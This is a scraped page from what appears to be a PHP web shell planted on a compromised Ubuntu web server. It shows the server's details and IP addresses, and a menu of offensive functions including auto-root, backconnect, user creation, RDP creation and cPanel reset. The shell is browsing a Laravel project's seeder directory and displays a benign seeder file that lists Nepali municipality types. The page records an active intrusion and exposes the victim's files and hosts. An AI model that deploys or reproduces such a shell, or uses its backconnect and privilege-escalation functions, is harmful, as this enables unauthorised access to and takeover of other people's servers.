Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sifaris /
database /
seeders /
[ HOME SHELL ]
Name
Size
Permission
Action
AdminRolesSeeder.php
741
B
-rw-rw-r--
AdminUserSeeder.php
1.35
KB
-rw-rw-r--
CategorySeeder.php
2.87
KB
-rw-rw-r--
DatabaseSeeder.php
851
B
-rw-rw-r--
LanguageSeeder.php
557
B
-rw-rw-r--
MasterDistrictSeeder.php
14.68
KB
-rw-rw-r--
MasterMunicipalitySeeder.php
173.19
KB
-rw-rw-r--
MasterMunicipalityTypeSeeder.p...
1.32
KB
-rw-rw-r--
MasterProvinceSeeder.php
1.77
KB
-rw-rw-r--
MasterTypeSeeder.php
1.52
KB
-rw-rw-r--
PrioritySeeder.php
1.02
KB
-rw-rw-r--
StatusSeeder.php
960
B
-rw-rw-r--
UserSeeder.php
561
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : MasterMunicipalityTypeSeeder.php
<?php namespace Database\Seeders; use App\Models\MasterMunicipalityType; use App\Models\MasterProvince; use Illuminate\Database\Seeder; use DB; class MasterMunicipalityTypeSeeder extends Seeder { /** * Run the database seeds. * * @return void */ public function run() { if(MasterMunicipalityType::exists()){ $output = new \Symfony\Component\Console\Output\ConsoleOutput(); $output->writeln('master_municipality_types was seeded already. No additional action taken.'); return; } $data = [ [ 'id' => 1, 'title' => 'Metropolitan City', 'title_np' => 'महानगरपालिका' ], [ 'id' => 2, 'title' => 'Sub Metropolitan City', 'title_np' => 'उप महानगरपालिका' ], [ 'id' => 3, 'title' => 'Municipality', 'title_np' => 'नगरपालिका' ], [ 'id' => 4, 'title' => 'Rural Municipality', 'title_np' => 'गाउँपालिका' ] ]; DB::table('master_municipality_types')->insert($data); } }
Close